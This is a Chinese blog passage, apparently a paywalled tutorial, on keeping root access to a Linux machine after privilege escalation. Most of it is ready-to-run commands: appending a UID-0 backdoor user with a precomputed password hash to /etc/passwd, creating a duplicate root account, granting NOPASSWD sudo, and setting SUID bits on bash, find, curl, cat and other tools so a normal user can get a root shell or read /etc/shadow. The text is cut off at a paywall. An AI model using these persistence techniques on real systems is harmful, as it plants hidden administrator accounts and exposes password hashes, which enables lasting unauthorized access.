前提
已经提权到管理员权限
一、创建账户
1、创建一个自定义密码的账户
已知,Linux中所有的用户的信息 存储在/etc/passwd这个文件中 。可以利用管理员权限修改这个文件, 添加一个账户 。
利用linux中的密码的编码算法 生成对应密码 (不知道的百度搜索一下)
加密密码:
password@123-->advwtv/9yU5yQ
使用命令生成账户或直接复制到passwd文件中:
echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
测试:
登录成功
2、直接创建管理员账户
#创建账户
useradd -o -u 0 -g 0 sun_happy
#设置密码
passwdpassword@123
3、配置sudoers文件
修改
/etc/sudoers配置文件 在此文件配置用户Sun_happy ALL=(ALL) NOPASSWD:ALL在之前的文章中已经介绍过了,就不过多的描述了。
执行命令时 ,命令之前加上 sudo就可以以管理员的身份运行 。
4、普通用户+SUID权限
(1)给以下命令加上 s权限:
chmod u+s /bin/bash $ bash -p
chmod u+s /bin/sh $ sh -p
chmod u+s /bin/env $ env /bin/sh -p
chmod u+s /bin/vi $ vi /etc/shadow
chmod u+s /bin/awk $ awk '{print $0}' /etc/shadow
chmod u+s /bin/cat $ cat /etc/shadow
chmod u+s /usr/bin/curl $ curl file:///etc/shadow
chmod u+s /bin/find $ find /etc/passwd -exec cat /etc/shadow \;
find /etc/passwd -exec bash -p \;
缺点是:容易被发现。
(2)创建一个普通用户+SUID:
#首先创建一个普通用户
useradd lisi
passwd
最低0.47元/天 解锁文章
扫一扫
882
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
